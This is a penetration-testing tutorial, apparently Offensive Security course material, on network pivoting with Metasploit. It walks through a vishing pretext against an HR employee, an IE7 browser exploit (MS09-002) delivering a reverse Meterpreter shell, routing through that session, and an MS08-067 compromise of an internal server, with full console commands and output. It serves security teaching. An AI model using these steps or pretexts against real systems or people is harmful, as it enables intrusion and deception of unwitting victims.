Pivoting
Pivoting is the unique technique of using an instance (also referred to as a 'plant' or 'foothold') to be able to "move" around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems. In this scenario we will be using it for routing traffic from a normally non-routable network.For example, we are a pentester for Security-R-Us. You pull the company directory and find poor Mary Jo Swanson in Human Resources on Sneaks.IN main website. You call up Mary Swanson and claim you are from the information technology group and you need her to go to this website to patch her computer from "suspicious traffic". She visits your site and you happen to be running the latest Internet Explorer vulnerability.
msf > use windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Use SSL
URIPATH / no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
msf exploit(ms09_002_memory_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002_memory_corruption) > set URIPATH /
URIPATH => /
msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms09_002_memory_corruption) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Use SSL
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/patchupmeterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
msf exploit(ms09_002_memory_corruption) > set LHOST 10.10.1.109
LHOST => 10.10.1.109
msf exploit(ms09_002_memory_corruption) > set LPORT 8080
LPORT => 8080
msf exploit(ms09_002_memory_corruption) > exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.10.10.243:80/
[*] Server started.Our social engineering attack has been successful! Poor Mary Swanson has connected to our website and has unknowingly given us full access to her computer.
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.10.1.109:80/
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.10.1.109:8080 -> 10.10.1.104:62239)
msf exploit(ms09_002_memory_corruption) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.10.1.109:8080 -> 10.10.1.104:62239
msf exploit(ms09_002_memory_corruption) >The question from here is, where do we go next?
We have to somehow further gain access and dive deeper into the network. If you noticed, we used a REVERSE Meterpreter payload. Notice the attacking machines IP address is in a different subnet than the victims machine. The victims IP address is 10.211.55.140 and our attacking IP is 10.10.1.109. How can we launch attacks against other systems on the network? If we want to go after another IP address at 10.211.55.128, we need to pivot our attacks and exploit the system. Let's do it.
We begin by interacting with the Meterpreter session and making note of our IP address vs the victims IP. We issue the 'route' command to view the available subnets on the victim PC.
msf exploit(ms09_002_memory_corruption) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.10.1.109:8080 -> 10.10.1.104:62239
msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0d:29:d9:ec:cc
inet addr:10.10.1.109 Bcast:10.10.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7542708 (7.5 MB) TX bytes:2385453 (2.3 MB)
Interrupt:19 Base address:0x2024
msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 10.211.55.2
10.211.55.0 255.255.255.0 10.211.55.140
10.211.55.140 255.255.255.255 127.0.0.1
10.255.255.255 255.255.255.255 10.211.55.140
127.0.0.0 255.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 10.211.55.140
255.255.255.255 255.255.255.255 10.211.55.140
meterpreter >
Background session 1? [y/N]yWith this valuable information in hand, we add the new route to Metasploit using the subnet and subnet mask of the victim and pointing it to the Meterpreter session number which is '1' in this case. Running the 'route print' command will display the routes available to us.
msf exploit(ms09_002_memory_corruption) > route add 10.211.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.211.55.0 255.255.255.0 Session 1
msf exploit(ms09_002_memory_corruption) >We will now use our newly created route to exploit a system further inside the victim network.
msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/patchupmeterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 10.10.1.109
LHOST => 10.10.1.109
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.1.109:9000 -> 10.10.1.104:62260)
meterpreter >
Background session 2? [y/N]yIt certainly appears that we successfully pivoted into the network. Let's confirm that we are where we want to be.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.10.1.109:8080 -> 10.10.1.104:62239
2 Meterpreter 10.10.1.109:9000 -> 10.10.1.104:62260
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 6:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 10.211.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.211.55.2
C:\WINDOWS\system32>Success! We have successfully routed our exploit to the 10.211.55.0/24 network and successfully compromised hosts inside the normally non-routable network!
We now have full access to both 10.211.55.140 and 10.211.55.128! If you notice it says that 10.10.1.109 is connected to 10.10.1.104, note that we did a reverse payload and that 10.10.1.104 is the external IP address. The 10.211.55.128 and 10.211.55.140 are NATed behind the router 10.10.1.104.
© Offensive Security 2009